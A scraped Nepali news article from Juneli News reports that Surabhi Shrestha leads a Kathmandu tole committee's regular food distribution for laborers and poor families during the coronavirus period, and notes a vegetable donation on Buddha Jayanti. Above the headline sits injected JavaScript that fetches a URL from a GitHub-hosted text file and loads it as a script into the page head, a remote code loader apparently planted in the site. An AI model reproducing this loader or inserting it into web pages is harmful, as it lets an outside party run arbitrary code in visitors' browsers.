;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); समाजसेवी सुरभी श्रेष्ठद्वारा मजदुर तथा बिपन्नहरुलाई नियमित खाना बितरण – जुनेली न्युज
शुक्रबार, साउन ११, २०८२
  • होमपेज
  • समाजसेवी सुरभी श्रेष्ठद्वारा मजदुर तथा बिपन्नहरुलाई नियमित खाना बितरण
जुनेली बिशेष

समाजसेवी सुरभी श्रेष्ठद्वारा मजदुर तथा बिपन्नहरुलाई नियमित खाना बितरण

जुनेली न्युज,
काठमाडौँ | काठमाडौँ महानगरपालिकाको  वडा नं २५ बाङ्गेमूढा  स्थित नारायण मन्दिर टोल सुधार समाजबाट २०७७ बैशाख २५ गते देखि मजदुर तथा विपन्न परिवारहरूलाई खाना खुवाउने कार्यक्रम भैरहेको छ | सो पुण्यको कार्यलाई पूर्ण रूपले नेतृत्व सुरभि श्रेष्ठले गरेकी छिन् ।
२५६४औ बुद्ध जयन्तिको अवसरमा नेपाल दलित विद्यार्थी संघको अध्यक्ष एबम् युवा नेता राजु सुनारले चार दिन सम्मलाई पुग्ने तरकारी मन्दिरकी अध्यक्ष अञ्जना श्रेष्ठ ज्यूलाई हस्तान्तरण गर्नुभएको छ।

कोरोना भाइरसको कारण मजदुर र बिपन्न बर्गलाई मार परेको हुदा केहि सहयोग होस भन्ने हेतुले खाना खुवाउन लागिएको सुरभी श्रेष्ठले बताइन |

 

 

 

फेसबुक प्रतिक्रियाहरु